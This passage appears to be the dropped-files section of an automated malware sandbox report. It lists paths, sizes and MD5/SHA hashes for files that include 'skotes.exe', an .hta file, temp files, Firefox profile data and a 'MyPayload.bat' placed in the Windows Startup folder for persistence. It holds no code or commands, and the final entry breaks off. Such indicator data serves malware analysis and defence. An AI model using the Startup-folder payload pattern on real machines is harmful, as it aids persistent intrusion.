                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1aankdn.bzg.ps1

                                                                                                                  Filesize

                                                                                                                  60B

                                                                                                                  MD5

                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                  SHA1

                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                  SHA256

                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                  SHA512

                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                  Filesize

                                                                                                                  2.0MB

                                                                                                                  MD5

                                                                                                                  2341120afd619b888c8316c0a91d39b8

                                                                                                                  SHA1

                                                                                                                  a20ac1ddd4110ea8a3e7732c8b49ab84df004ce7

                                                                                                                  SHA256

                                                                                                                  c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b

                                                                                                                  SHA512

                                                                                                                  89cefe006dbd385374fb4feee4b32b944bacee34ae160404ab3516ab12bded8c976699d76290fbc9dd911ba9bfa0c906b944a68d06baad25fc1529cc3a204d0b

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\t3amAh6NC.hta

                                                                                                                  Filesize

                                                                                                                  726B

                                                                                                                  MD5

                                                                                                                  a2ff117bfed349ec85abfb5ad6c0c9ae

                                                                                                                  SHA1

                                                                                                                  4fa70080e5c3e68b51056a43618ed6855ea8e0c9

                                                                                                                  SHA256

                                                                                                                  4c9708335a1f3dab0271267ad806611562042f640457a175e52847102f5f9760

                                                                                                                  SHA512

                                                                                                                  7739ef6492d88b995e6d46542a2873bcf9947c0c56eb358c87060354dd28572441cfbff28ed75d79c7e0bc1b242254b87848a447add6b5e8a4019097b0b1068d

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp3290.tmp

                                                                                                                  Filesize

                                                                                                                  40KB

                                                                                                                  MD5

                                                                                                                  a182561a527f929489bf4b8f74f65cd7

                                                                                                                  SHA1

                                                                                                                  8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                  SHA256

                                                                                                                  42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                  SHA512

                                                                                                                  9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp3296.tmp

                                                                                                                  Filesize

                                                                                                                  114KB

                                                                                                                  MD5

                                                                                                                  ee397aaf61a98698a7f29b173816759b

                                                                                                                  SHA1

                                                                                                                  6fb86529c834ee09a432384fc0b126052986c394

                                                                                                                  SHA256

                                                                                                                  6b4aef8a36045f80bbbd799331f453f0058a7e9b1553e00e10faefc9432c5a04

                                                                                                                  SHA512

                                                                                                                  25e0214f518bd7d8330b8dbf44f726de6f26a9840197c5beeed7a466d28538c21cb82681d6a4a99a25d5f62483e703078de5eb912a861770ce67656faeee22b0

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp32C2.tmp

                                                                                                                  Filesize

                                                                                                                  48KB

                                                                                                                  MD5

                                                                                                                  349e6eb110e34a08924d92f6b334801d

                                                                                                                  SHA1

                                                                                                                  bdfb289daff51890cc71697b6322aa4b35ec9169

                                                                                                                  SHA256

                                                                                                                  c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

                                                                                                                  SHA512

                                                                                                                  2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp32C8.tmp

                                                                                                                  Filesize

                                                                                                                  20KB

                                                                                                                  MD5

                                                                                                                  49693267e0adbcd119f9f5e02adf3a80

                                                                                                                  SHA1

                                                                                                                  3ba3d7f89b8ad195ca82c92737e960e1f2b349df

                                                                                                                  SHA256

                                                                                                                  d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

                                                                                                                  SHA512

                                                                                                                  b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp32CE.tmp

                                                                                                                  Filesize

                                                                                                                  116KB

                                                                                                                  MD5

                                                                                                                  f70aa3fa04f0536280f872ad17973c3d

                                                                                                                  SHA1

                                                                                                                  50a7b889329a92de1b272d0ecf5fce87395d3123

                                                                                                                  SHA256

                                                                                                                  8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                                                                                  SHA512

                                                                                                                  30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp32E8.tmp

                                                                                                                  Filesize

                                                                                                                  96KB

                                                                                                                  MD5

                                                                                                                  40f3eb83cc9d4cdb0ad82bd5ff2fb824

                                                                                                                  SHA1

                                                                                                                  d6582ba879235049134fa9a351ca8f0f785d8835

                                                                                                                  SHA256

                                                                                                                  cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

                                                                                                                  SHA512

                                                                                                                  cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp394E.tmp

                                                                                                                  Filesize

                                                                                                                  414KB

                                                                                                                  MD5

                                                                                                                  4acc1e5392d9d257da6b68000c40ebc2

                                                                                                                  SHA1

                                                                                                                  d787d9fef42e55818e8c964094584c465740dd22

                                                                                                                  SHA256

                                                                                                                  dcba82623cc8f59180c0d2067cb650cec8162027e0d9aa050468662cb00e5b69

                                                                                                                  SHA512

                                                                                                                  76e3506c678e065bb6f4b9ac1d0face0853563ace1b2a28de8d3fb34bb9ccddad66b084e54512fb29ef5a56db885c04acf373b28de9dabd1e7ba723b9b2df21a

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp3968.tmp

                                                                                                                  Filesize

                                                                                                                  10KB

                                                                                                                  MD5

                                                                                                                  895064c10b73e42539c969e09847b284

                                                                                                                  SHA1

                                                                                                                  a52e429a0ce5850b88f35bf4cd57a830a8f0675b

                                                                                                                  SHA256

                                                                                                                  85990fad31c9ddf45ed82c7f2d9785bae3cd5ea1a2338559c4aa47256f3a8f50

                                                                                                                  SHA512

                                                                                                                  93bf09a7715318c1a51645c3d4de8e04634b655d88732c9138b93c9da6234d21094e25dbec5cba5eafba26734a78099cbdc0eec8fd50c2ef7ba166ac028b8d85

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp3969.tmp

                                                                                                                  Filesize

                                                                                                                  10KB

                                                                                                                  MD5

                                                                                                                  33f900c61e417f5edcba976f1042bb05

                                                                                                                  SHA1

                                                                                                                  b32db55c540362f8fe888a464f8aad5d971468a3

                                                                                                                  SHA256

                                                                                                                  d2738c7948ed153455b4c2f727573870dd32be3528e77ee17916eb19c23687c1

                                                                                                                  SHA512

                                                                                                                  21f48c45fd9e016941e187b57846fa005fed7d2403ba1d7e16aefbc24c42ac7433d7f602f5320019bb941234a3204cb4a34c25643a4ceb7578b73a29372ae7cb

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp3992.tmp

                                                                                                                  Filesize

                                                                                                                  11KB

                                                                                                                  MD5

                                                                                                                  bd127e2a25f95d1808bffcd8e7ff055c

                                                                                                                  SHA1

                                                                                                                  2bde111029bd23b134236f0f3e38b9f5cedd913c

                                                                                                                  SHA256

                                                                                                                  21b6537cf2111a4dc13b105ea22572787f11882e9e6182678f195a91477604db

                                                                                                                  SHA512

                                                                                                                  1ad1b93e3b46eb1cb2faab9267b5c32ea451bddf3474c90ebbe8ba551c8f5598bb85175aa5b707305da2099b36ed54a600aa0cbc8f74d4fcfd9833108b757aa7

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp3993.tmp

                                                                                                                  Filesize

                                                                                                                  493KB

                                                                                                                  MD5

                                                                                                                  c2a5f7d31335b26aefd212e632a97c4e

                                                                                                                  SHA1

                                                                                                                  d2408609220c6e2aac3131ef73b23ace3719a031

                                                                                                                  SHA256

                                                                                                                  1aa827824e1f24ed649e5cfdb4c638ea761c7b84cacf8b242a8990f17d2baa0d

                                                                                                                  SHA512

                                                                                                                  b2252d0152690484b439f167fa0fa0a6553e0bf92704bb6e806058cc6f2fd1cc3fe10fafeb70c91781c0e5633cb4f94425ea7cefcaf8a56d5efbd2adc48869ff

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp39C6.tmp

                                                                                                                  Filesize

                                                                                                                  15KB

                                                                                                                  MD5

                                                                                                                  27536cf50e181747a089f404013a16ac

                                                                                                                  SHA1

                                                                                                                  396afb49eb904dfd5e96930c922780453aad50f6

                                                                                                                  SHA256

                                                                                                                  3ed5e9f61f174f4af9cc17f1456bc4e3d564ed286bd523e9a7239264ab7c7ac9

                                                                                                                  SHA512

                                                                                                                  31b8e938fdbee497bfa9735cae02c2c3c376ea17e3a90a44441170a3eb07c6f656cb97f317914c430079165959403e0e1de7f68df4234fd89e9bd023a99154d9

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp39C7.tmp

                                                                                                                  Filesize

                                                                                                                  1.3MB

                                                                                                                  MD5

                                                                                                                  e5a597c85765349100b6787d818c473a

                                                                                                                  SHA1

                                                                                                                  d7488d9d01a4d226eba0751ab60ca802818d5a71

                                                                                                                  SHA256

                                                                                                                  d089dd5de7292d45619049baa8efca8eac3aedbf1ee8d3b0c485b309f6f3df01

                                                                                                                  SHA512

                                                                                                                  9904d06733e3cf18380834133630e423643c8b7cb0276f8991322a2bf4a1ce9d9ba9186fb7a8b28d991ea17d72d9af8be27ee77198133126d7cc19a0653675e1

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp39C9.tmp

                                                                                                                  Filesize

                                                                                                                  17KB

                                                                                                                  MD5

                                                                                                                  54c5af06409bd70275a4bfcbb0b17b33

                                                                                                                  SHA1

                                                                                                                  3222f2abb26246f9e533067c933130f9d434f377

                                                                                                                  SHA256

                                                                                                                  e3c8dbac1dfd65ef0e78b3e9a2556c6ce345547aa0a5d150a55911147c04c3c6

                                                                                                                  SHA512

                                                                                                                  069c3b68dafadf6952cdf734fdc45a667f9d330b9b6ef366970847502c39ffc0d498cd176a32ac6341e54c5d6cdc9ea85f1e800e4ccb859ee58012327aeb9c35

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                  Filesize

                                                                                                                  479KB

                                                                                                                  MD5

                                                                                                                  09372174e83dbbf696ee732fd2e875bb

                                                                                                                  SHA1

                                                                                                                  ba360186ba650a769f9303f48b7200fb5eaccee1

                                                                                                                  SHA256

                                                                                                                  c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                                                                                                                  SHA512

                                                                                                                  b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                                                                                  Filesize

                                                                                                                  13.8MB

                                                                                                                  MD5

                                                                                                                  0a8747a2ac9ac08ae9508f36c6d75692

                                                                                                                  SHA1

                                                                                                                  b287a96fd6cc12433adb42193dfe06111c38eaf0

                                                                                                                  SHA256

                                                                                                                  32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                                                                                                                  SHA512

                                                                                                                  59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

                                                                                                                  Filesize

                                                                                                                  330KB

                                                                                                                  MD5

                                                                                                                  aee2a2249e20bc880ea2e174c627a826

                                                                                                                  SHA1

                                                                                                                  aa87ed4403e676ce4f4199e3f9142aeba43b26d9

                                                                                                                  SHA256

                                                                                                                  4d9c00fc77e231366228a938868306a71383967472d0bbf1a89afe390d80599c

                                                                                                                  SHA512

                                                                                                                  4e96c2aa60cc1904ac5c86389f5d1226baf4ef81e2027369979ec253b383eccc666da268647843d1db128af16d1504cdc7c77757ad4147a0332ec9f90041a110

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin

                                                                                                                  Filesize

                                                                                                                  18KB

                                                                                                                  MD5

                                                                                                                  be95fe654bf499c5dad7d2548507c301

                                                                                                                  SHA1

                                                                                                                  c3a4453b8eba6d419c83be3124857211dddf7f1d

                                                                                                                  SHA256

                                                                                                                  c6cead83aca0212ad879b8eb0a68e2240eb81635717598b80610df15392695e1

                                                                                                                  SHA512

                                                                                                                  3596a009a3fe8499bcbc7e43d607d4bfefe26b425418eb9c69921855ee546ad14dd81415cd29d9cdc36bfd4c8fa60345c57aea70f764deca53e725570827b6eb

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin

                                                                                                                  Filesize

                                                                                                                  10KB

                                                                                                                  MD5

                                                                                                                  dacb9d824b6fc5bb6f6f9daff21fca03

                                                                                                                  SHA1

                                                                                                                  a625150e6d908ceb2111cda9a6fad4322ed873a9

                                                                                                                  SHA256

                                                                                                                  10ec3f400bcad3b717e0e70a1e8591b71a0e1512426d8d0f704593689433c8ff

                                                                                                                  SHA512

                                                                                                                  f680d618a611ba398c595d0c824d98c598e35507c8c694e75730f26d964d870a1b2b2cca4a86e0997f356d44d969852193d09b24adbc3693c7f3503f616a2099

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\broadcast-listeners.json

                                                                                                                  Filesize

                                                                                                                  221B

                                                                                                                  MD5

                                                                                                                  65c47ba05520f945199ab7176a4b51da

                                                                                                                  SHA1

                                                                                                                  98d6462634fa3823c05ae5c857b5df3c7b55799d

                                                                                                                  SHA256

                                                                                                                  cfdbed896cf1d77872bfb53b5ef478dd860718598541ac4c28f72f611ad49cf1

                                                                                                                  SHA512

                                                                                                                  896ab5ef35bd245c2c25d78815a7fdb04d02d17e8f2f8a565c8558222d4794f3bbaa45e177e80af6b2d1bf4955e8356dd241d6662ebf32e072a120cf83e48690

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                  Filesize

                                                                                                                  6KB

                                                                                                                  MD5

                                                                                                                  2840c8642c16dd68417903fc5c1c09b7

                                                                                                                  SHA1

                                                                                                                  24eef4ee37627627469f2dfa7a7cbaa0a372e08e

                                                                                                                  SHA256

                                                                                                                  e30b1a675345637b42dca98f73e68d3a54cc05f640acb0da489f026ba677cfcd

                                                                                                                  SHA512

                                                                                                                  d67c49cd787e7b356e59213748d55e412301840896c6a0a2e6e10a183f87d51d99b50343782066f2cfa65d93442129321aa314336bbd801bfb0fc5ff33ca5f3c

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                  Filesize

                                                                                                                  29KB

                                                                                                                  MD5

                                                                                                                  6b04132b692df4311229c94ea7f39c45

                                                                                                                  SHA1

                                                                                                                  6fdcf40c62f7305b7a57194ebbe0d6ebe809a6c5

                                                                                                                  SHA256

                                                                                                                  e614011bb169c870cf65866e274572471062a9f46a6bdc7a5d2cd093d1e5a248

                                                                                                                  SHA512

                                                                                                                  928d65e8fb36ac98e747bf62af0a9b635ae4496cb206d90e6eceb560f9fd2718213b33606e9ca812bd3643a52c58f2d172b5263669972a4b55ea7026684f0476

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                  Filesize

                                                                                                                  6KB

                                                                                                                  MD5

                                                                                                                  0eae1871399af9d604a5c893978975e8

                                                                                                                  SHA1

                                                                                                                  ea93f0d955e101aa8181b4824ca645537eb0ca2f

                                                                                                                  SHA256

                                                                                                                  ca52153a8fb2ef62cef4a6ffdec89c6381816326754500d6ea6c98d479e48919

                                                                                                                  SHA512

                                                                                                                  14496a1937fd9f27a01caefe6907af9c1a15590c569040fd8b8735ce95621631a24b9414233cfe039f4d8689194f391865d6307f5fc6fc78db2427120caae023

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                  Filesize

                                                                                                                  27KB

                                                                                                                  MD5

                                                                                                                  0e1a0e2770f58b6ad23e39f2e4f74510

                                                                                                                  SHA1

                                                                                                                  8e330e674c5c6cf4001be9601c1dace380997d85

                                                                                                                  SHA256

                                                                                                                  e28d42f0b58b133c5f2480417cbc6e2ff9abd53daf728a9497ad8ada24b21ef8

                                                                                                                  SHA512

                                                                                                                  149c77f234f5c9c19c789e11a4d784a726749a06b0ffc25f9160ff4313a4a3ed909bd66ad8fe40108a0296bbb72e6b8574ef31e044182a1193c41b491b85ab74

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                  Filesize

                                                                                                                  5KB

                                                                                                                  MD5

                                                                                                                  2c3875a5971dc057d1f8a941ea245c4a

                                                                                                                  SHA1

                                                                                                                  f4ddc580fb05a61c6bb4d5e1683df18ee25c74a3

                                                                                                                  SHA256

                                                                                                                  3beeed622844cdcc12fe53270f65baf14ec29bbae2cee6646cd25dcbcac2a3ea

                                                                                                                  SHA512

                                                                                                                  f3c14897269cb774224a8b1c6d85d92b44d2abd37c81c748756a42bdcfb3219e1de0fd256fcc67e01c0ea3e25d0b2a70fa5039e138e1b4575a6c23802915fd58

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                  Filesize

                                                                                                                  27KB

                                                                                                                  MD5

                                                                                                                  bd08b2245f24add2013911e8845f1185

                                                                                                                  SHA1

                                                                                                                  07622fe51b7c799c63ebd26e3d4b7b7c6533091e

                                                                                                                  SHA256

                                                                                                                  07d503bd2383e1bf541453a2d9e3e475b1e6b5b5789a609b6b4d3c494ac86648

                                                                                                                  SHA512

                                                                                                                  4491c20fe022635d991b635b9f53ca80ae6178d79b7af9b8659dfd76a577f2f2e4a63ef89173061c09dcea3b826e23f4f54147b6bbe14175a7a8d2434300b29e

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                  Filesize

                                                                                                                  27KB

                                                                                                                  MD5

                                                                                                                  1b85b659750bd8b0052b4ab681878e71

                                                                                                                  SHA1

                                                                                                                  5a5f73da4c85d9d20f7a3292af48d4faeff684b4

                                                                                                                  SHA256

                                                                                                                  d803424fcbed967b09db575218a42e750e09e91b956a1b97c66ba5ea221c4f68

                                                                                                                  SHA512

                                                                                                                  c8ec28ea054f4d91641864385f61bf4d6b9bfb82b3c92477ee24fbf21b0b02487a2aeacd03ce59c542b870db624671d7b9e43b9d125acc49ad3da1c8498b5db0

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                  Filesize

                                                                                                                  27KB

                                                                                                                  MD5

                                                                                                                  bd355fa9fcab1ee44029ef50ef0a6e4b

                                                                                                                  SHA1

                                                                                                                  c0426daa438f055d1138b52c266b6b9e43954414

                                                                                                                  SHA256

                                                                                                                  46549d21a6d718554749630fe3eccd1f3a9083e6cf3c8eb4132a13d6a197b3bf

                                                                                                                  SHA512

                                                                                                                  28b2b463bf021f92c76be97ffb2b0e02f857d13fef3cdc5ce69e01ae08d80e5f013c87370dcb74143256bac502fff6d8079c2677d3383d18b428d78ef8d10057

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                  Filesize

                                                                                                                  26KB

                                                                                                                  MD5

                                                                                                                  c326c25f568fbc542517c4c16ba2bd82

                                                                                                                  SHA1

                                                                                                                  c4a1ce04abca6868e9a4aeb66c9f05ed8e6abb5c

                                                                                                                  SHA256

                                                                                                                  663ab8641a801d6e3becb16c3e33c9a2cdccdb3cc62bcf1526157300541dbee7

                                                                                                                  SHA512

                                                                                                                  4778a14f1a73172f06305010f82a8cb3afaaf168f06f772d60369beb177220b1a8afea0b5a3ff1b953479d506b36aa8495ef6cb692887d4fbafce2b2a60033a4

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\2a28b698-c757-428f-a615-29d057b1a06f

                                                                                                                  Filesize

                                                                                                                  788B

                                                                                                                  MD5

                                                                                                                  c0a7ee7714c4ebe37e757d87f9a5a2a3

                                                                                                                  SHA1

                                                                                                                  8d4f4444af7ee15e36cab0030cf1877b5c8d1adb

                                                                                                                  SHA256

                                                                                                                  34137bc797e6dc5ac22c1c3c74b951c75b443b42b807321624087c613a1a02c6

                                                                                                                  SHA512

                                                                                                                  b8f0966cf1f1ac936cbf98cebe8476a49729f086a645f83929bb06d8a844f9aa82a119072a67a489225ce2d7b1be042b9b7949e6836e7f4315f6793d73d68798

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\2b516412-5c9e-4da6-95d9-91a22f9c8a28

                                                                                                                  Filesize

                                                                                                                  791B

                                                                                                                  MD5

                                                                                                                  f54145c22133abd73fd3cce103f399f9

                                                                                                                  SHA1

                                                                                                                  772cb7accb7028d64c0948e4727ad6516c9e3a94

                                                                                                                  SHA256

                                                                                                                  917d14f2b5b50baa3e93b0518ada029db90e305aabd5b5aa0bef12b8b6389e3a

                                                                                                                  SHA512

                                                                                                                  d1c9f64f45ebc31053cc4d18c89c774558b06eda5d249039f6cc7b25ea544237183b21e662d52adde9fbf6cb6e0e434acd17a443807b0584114db4ac971b5e0d

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\55928e1e-1231-4bea-94d0-bb4a2a39d7e8

                                                                                                                  Filesize

                                                                                                                  671B

                                                                                                                  MD5

                                                                                                                  41476619284ca6a030da891ed93888a3

                                                                                                                  SHA1

                                                                                                                  ccf32db91a33f91fd06c966561b867490ecc44e7

                                                                                                                  SHA256

                                                                                                                  4afedc9fe97b837d5a4f69ccb4fa930e54ef415507baec66a697482ea7de0968

                                                                                                                  SHA512

                                                                                                                  9af57c980505f91b94ac23942fbb02b76052188dc56fa3981312312b55cb2fad76512854fdfdac93eefcc04fd76d27ebcf01164c0e19cc6f538ffb5bbd9de0c9

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\63df2f08-e6c2-4e3e-815d-ff686e3e0b51

                                                                                                                  Filesize

                                                                                                                  27KB

                                                                                                                  MD5

                                                                                                                  836fce9ce5458ba3696b85d349522c95

                                                                                                                  SHA1

                                                                                                                  c7d9d8965329f9dcf573bebede762421e4b5a2af

                                                                                                                  SHA256

                                                                                                                  17846c5388c488cc91a692449a09ba823dfe5b978629b61642004d6754f54856

                                                                                                                  SHA512

                                                                                                                  97deec170f26a283933e260bcf23f09ac58280d33541997e706c1f2f4edba0c2e3b45309d4d3914b6f9ae102aaf0262b2a65371cb8004ef1660ebbcc34c163ec

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\68974ed1-32ac-48e1-b090-a128e7ed3ef8

                                                                                                                  Filesize

                                                                                                                  982B

                                                                                                                  MD5

                                                                                                                  bf1d8a52f4d770e32f46331183fe00ba

                                                                                                                  SHA1

                                                                                                                  27a9a8c848bac8dccd52628469a8f05ec3b43e96

                                                                                                                  SHA256

                                                                                                                  717bc86561c93f410bea714e6bc8bcefd8a65b5a427d95ae8a84e75f40776f72

                                                                                                                  SHA512

                                                                                                                  9cab43c5288e30c589180cd60b3b85a897c218513c57e9b14bacad1fc4e7536d7490cb7ea2a7169fff165cc7a8049ef0327cc389f3d8277a1d82e26214f99210

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\d002d2ae-5e7b-4cc3-aa10-1840b9930761

                                                                                                                  Filesize

                                                                                                                  1KB

                                                                                                                  MD5

                                                                                                                  98828e4a192c92d838915cd5b7942dd0

                                                                                                                  SHA1

                                                                                                                  ebf99263e3302b8e38a79e0e1e3bc88ccf411f27

                                                                                                                  SHA256

                                                                                                                  cb03cdbabea771b5ecc7ebdb5981151e1876d6c9e71edc537bb9d4fbaf58a73e

                                                                                                                  SHA512

                                                                                                                  68c5b355e5c9731c6c1c37f61f62a0258f8fd8d84f5149ddb684d979a24b694f2d940a24a2489b9e177a36547c9cade0d92c01313aa447c05dbabd7aefd813c5

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\d05bec15-76f6-4371-8350-67fc8dce685c

                                                                                                                  Filesize

                                                                                                                  661B

                                                                                                                  MD5

                                                                                                                  b7bd44d1de2eb946a368638c70b5d554

                                                                                                                  SHA1

                                                                                                                  256d2e6042149e46eee5658d8c4cadab883a6e01

                                                                                                                  SHA256

                                                                                                                  530e7d4798390bfd3ac05eac48d31919edd09737f6f0965205d55184178f810d

                                                                                                                  SHA512

                                                                                                                  ea86e5cae90df0b090051a50e293af9482a937d15a9b9f9f0ee119531f5a51ecc777d20d1680c335c3c4aafae23c01375f62a4e774b2506103ddbb2144b4dbb8

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                                                                                                  Filesize

                                                                                                                  1.1MB

                                                                                                                  MD5

                                                                                                                  842039753bf41fa5e11b3a1383061a87

                                                                                                                  SHA1

                                                                                                                  3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                                                                                                  SHA256

                                                                                                                  d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                                                                                                  SHA512

                                                                                                                  d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                                                                                                  Filesize

                                                                                                                  116B

                                                                                                                  MD5

                                                                                                                  2a461e9eb87fd1955cea740a3444ee7a

                                                                                                                  SHA1

                                                                                                                  b10755914c713f5a4677494dbe8a686ed458c3c5

                                                                                                                  SHA256

                                                                                                                  4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                                                                                                  SHA512

                                                                                                                  34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                                                                                                  Filesize

                                                                                                                  372B

                                                                                                                  MD5

                                                                                                                  bf957ad58b55f64219ab3f793e374316

                                                                                                                  SHA1

                                                                                                                  a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                                                                                                  SHA256

                                                                                                                  bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                                                                                                  SHA512

                                                                                                                  79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                                                                                                  Filesize

                                                                                                                  17.8MB

                                                                                                                  MD5

                                                                                                                  daf7ef3acccab478aaa7d6dc1c60f865

                                                                                                                  SHA1

                                                                                                                  f8246162b97ce4a945feced27b6ea114366ff2ad

                                                                                                                  SHA256

                                                                                                                  bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                                                                                                  SHA512

                                                                                                                  5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs-1.js

                                                                                                                  Filesize

                                                                                                                  10KB

                                                                                                                  MD5

